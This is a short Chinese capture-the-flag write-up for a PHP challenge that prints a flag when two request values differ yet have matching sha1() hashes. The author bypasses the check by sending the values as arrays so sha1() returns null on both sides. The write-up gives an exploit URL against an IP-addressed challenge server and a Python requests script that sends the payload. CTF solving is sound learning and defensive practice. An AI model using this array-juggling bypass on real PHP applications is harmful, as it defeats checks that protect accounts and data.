<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
}
?>
寫過了之前的繞過,這道題應該不算什麼了
1.uname和passwd的值不能相同
2.uname和passwd的sha1()值要相同
3.id的值爲margin
要想uname和passwd的sha1值相同比較困難
我們用另一種思路,給這函數傳入一個錯誤的類型,使函數返回錯誤的值,令這個條件成立
http://123.206.87.240:8002/web7/?id=margin&uname[]=111
後面的&用法相當於&&
然後get傳入id和uname,post傳passwd
更新一波,用python上傳數據
import requests
url='http://123.206.87.240:8002/web7/'
url = url + '?uname[]=111&id=margin'
data={'passwd[]':'123'}
re=requests.post(url, data)
print(type(re))
print(re.text)